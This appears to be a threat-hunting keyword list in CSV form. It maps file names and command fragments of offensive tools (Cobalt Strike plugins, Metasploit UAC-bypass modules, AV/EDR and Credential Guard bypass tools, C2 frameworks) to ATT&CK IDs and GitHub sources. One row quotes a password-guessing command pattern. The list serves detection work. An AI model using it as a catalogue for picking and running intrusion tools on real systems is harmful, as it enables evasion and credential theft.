-*Burp_start.bat*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z
-*Burp_start_en.bat*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - 
T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z
-*burp2malleable.*,offensive_tool_keyword,cobaltstrike,Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CodeXTF2/Burp2Malleable,1,1,N/A,10,10,320,32,2023-04-06T15:24:12Z,2022-08-14T18:05:39Z
-*burp-co2/out/artifacts*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z
-*BurpCO2Suite.xml*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web 
penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z
-*burpcollaborator.net*,offensive_tool_keyword,burpsuite,Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*BurpFunctions.java*,offensive_tool_keyword,burpsuite,A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nccgroup/BurpSuiteHTTPSmuggler,1,1,N/A,N/A,7,668,108,2019-05-04T06:15:42Z,2018-07-03T07:47:58Z
-*burpitem.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-*burplog.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-*BurpShiroPassiveScan.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z 
-*burpstate.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-*Burpsuite*,offensive_tool_keyword,burpsuite,Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*burpsuite*.exe*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*burpsuite*.jar*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*burpsuite*.sh*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*burpsuite*.zip*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. 
and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*BurpSuiteCn.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z
-*BurpSuiteHTTPSmuggler*,offensive_tool_keyword,burpsuite,A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nccgroup/BurpSuiteHTTPSmuggler,1,1,N/A,N/A,7,668,108,2019-05-04T06:15:42Z,2018-07-03T07:47:58Z
-*BurpSuite-SecretFinder*,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,1,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z
-*burp-vulners-scanner-*.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z
-*burp-xss-sql-plugin*,offensive_tool_keyword,burpsuite,find several bugbounty-worthy XSSes. 
OpenRedirects and SQLi.,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0008 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/attackercan/burp-xss-sql-plugin,1,1,N/A,N/A,1,44,12,2016-09-28T21:46:18Z,2016-08-17T14:05:24Z
-*buster -e * -f john -l doe -b '****1989'*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*busterPayloads.txt*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z
-*bWV0YXNwbG9pdA==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z
-*byakugan/bin/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*Bye_Explorer.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z
-*BYOVD_kill_av_edr.*,offensive_tool_keyword,BYOVD_kill_av_edr,BYOD to kill AV/EDR,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c,1,1,N/A,10,3,228,42,2023-06-14T02:13:19Z,2023-01-15T22:37:34Z
-*bypass_cmdinject*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypass_powershell_protections*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Bypass-4MSI*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). 
of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021.006 - T1059.001 - T1059.003 - T1047,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*bypass-amsi*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*BypassAV.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike plugin for quickly generating anti-kill executable files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/hack2fun/BypassAV,1,1,N/A,10,10,830,126,2020-07-19T15:46:54Z,2020-02-17T02:33:14Z -*bypass-classic.dll*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*BypassCredGuard.*,offensive_tool_keyword,BypassCredGuard,Credential Guard Bypass Via Patching Wdigest Memory,T1558 - T1558.001 - T1055 - T1055.002,TA0006 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/BypassCredGuard,1,1,N/A,10,3,277,50,2023-02-03T06:55:43Z,2023-01-18T15:16:11Z -*BypassCredGuard-master*,offensive_tool_keyword,BypassCredGuard,Credential Guard Bypass Via Patching Wdigest Memory,T1558 - T1558.001 - T1055 - T1055.002,TA0006 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/BypassCredGuard,1,1,N/A,10,3,277,50,2023-02-03T06:55:43Z,2023-01-18T15:16:11Z -*BYPASS-DINVOKE*.dll*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*BYPASS-DINVOKE.dll*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*BYPASS-DINVOKE_MANUAL_MAPPING.dll*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion 
Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*bypass-pipe.c*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bypass-powershell.ps1*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*BypassUAC *.exe*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z 
-*bypassuac fodhelper*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*Bypass-UAC*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*bypassUAC*.boo*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*bypassUAC*.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. 
a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*--bypass-uac*--logontype*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,0,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*bypassuac_comhijack.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_compdefaults*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bypassuac_compmgmtlauncher*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bypassuac_eventvwr*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bypassuac_fodhelper*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bypassuac_injection*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_injection.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
